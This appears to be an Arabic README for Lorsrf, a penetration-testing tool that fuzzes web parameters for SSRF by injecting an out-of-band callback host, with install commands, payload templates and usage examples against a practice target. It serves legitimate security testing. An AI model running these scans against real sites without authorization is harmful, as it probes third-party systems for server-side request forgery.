
أداة سطر أوامر سريعة للعثور على المعلمات التي يمكن استخدامها لاكتشاف SSRF أو تحميل الموارد خارج النطاق 🛰️ 🦀

لورسرف (Lorsrf) هي أداة اختبار اختراق ويب قوية مصممة لتحديد المعاملات التي يمكن استغلالها في هجمات SSRF أو تحميل الموارد خارج النطاق. عن طريق إضافة مضيف OAST مثل Burp Collaborator إلى قيمة المعامل، يمكن لـ Lorsrf إنشاء طلب HTTP يتم استقباله في Burp Collaborator، دون أي معلومات فعلية عن الهدف.
لمعالجة هذه المشكلة، تتضمن Lorsrf ميزة تسمح لك بإضافة أجزاء محددة من معلومات الهدف كمتغيرات في مضيف OAST الخاص بك. وهذا يسمح لك بتحديد المعاملات والنقاط الضعيفة بسهولة أكبر، مما يجعل تأمين تطبيقات الويب الخاصة بك أسهل في النهاية.
بالإضافة إلى ما سبق، تسمح لك Lorsrf أيضًا بتضمين معلومات إضافية في مضيف OAST الخاص بك باستخدام متغيرات خاصة. على سبيل المثال، يمكنك تضمين نقطة النهاية لنطاق الهدف، أو استعلام عنوان URL، أو طريقة الطلب الحالية، وغير ذلك.
بشكل عام، Lorsrf هي أداة قوية يمكن تخصيصها لتلبية احتياجات اختبار الاختراق الخاصة بك. سواء كنت تسعى إلى تحديد وإصلاح الثغرات في تطبيقات الويب الخاصة بك أو تقييم أمان تطبيقات الويب التابعة لجهات خارجية، فإن Lorsrf تعد إضافة قيمة لأي مجموعة أدوات اختبار اختراق.
| المتغير | الوصف |
|---|---|
| %PARAM% | المعامل المُخمَّن |
| %PATH% | نقطة نهاية نطاق الهدف |
| %HOST% | المضيف الماسح |
| %QUERY% | استعلام عنوان URL |
| %METHOD% | الطريقة الحالية |
يمكنك استخدام هذه المتغيرات لتضمين المزيد من المعلومات في مضيف OAST الخاص بك
target: http://testphp.vulnweb.com/showimage.php
payload: http://%HOST%.%PARAM%.testing.interactsh.com%PATH%
output: http://testphp.vulnweb.com.file.testing.interactsh.com/showimage.php
بشكل افتراضي، يستخدم لورسرف طريقة GET. إذا كنت تريد طريقة POST مع جسم نموذج أو JSON، يمكنك إضافة هذه العلامات
$ lorsrf --json --form
إذا كنت تريد POST فقط، أضف العلامة --post-only
>>> apt install gcc pkg-config libssl-dev
>>> cargo install --git https://github.com/knassar702/lorsrf
أو قم بتنزيله من صفحة الإصدارات
$ lorsrf --urls targets.txt -c "http://myhost.com" --wordlist params.txt
$ lorsrf --urls targets.txt -c "http://myhost.com" --wordlist params.txt --json
$ lorsrf --urls targets.txt -c "http://myhost.com" --wordlist params.txt --form
ماسح المعاملات بدون تخمين
$ waybackurls http://testphp.vulnweb.com > urls.txt
$ lorsrf --urls urls.txt -c "http://myhost.com" --wordlist params.txt
خيارات إضافية
Lorsrf 2.0
Khaled Nassar <[email protected]>
SSRF Parameter BruteForce Tool
USAGE:
lorsrf [FLAGS] [OPTIONS] --call <host> --urls <targets>
FLAGS:
-f, --form Use x-www-form-urlencoded requests via POST method
-h, --help Prints help information
-j, --json Use JSON requests via POST method
--post-only POST method only
-V, --version Prints version information
OPTIONS:
-H, --headers <headers> Your Headers [default: ]
-c, --call <host> Your The OAST Host (burpsuite collaborator or interactsh.com)
-p, --proxy <proxy> SendProxy [default: ]
-u, --urls <targets> Your Targets list
--threads <threads> Your Threads [default: 10]
-t, --timeout <timeout> Set the Timeout of the requests [default: 10]
-w, --wordlist <wordlist> Your Parameters Wordlist